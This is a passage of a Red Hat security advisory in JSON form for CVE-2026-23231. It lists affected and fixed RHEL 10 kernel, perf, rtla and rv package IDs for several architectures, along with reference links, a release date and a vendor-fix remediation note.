"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23231"
},
{
"category": "external",
"summary": "RHBZ#2444376",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444376"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23231",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23231"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23231",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23231"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026030436-CVE-2026-23231-1a96@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026030436-CVE-2026-23231-1a96@gregkh/T"
}
],
"release_date": "2026-03-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T18:30:02+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
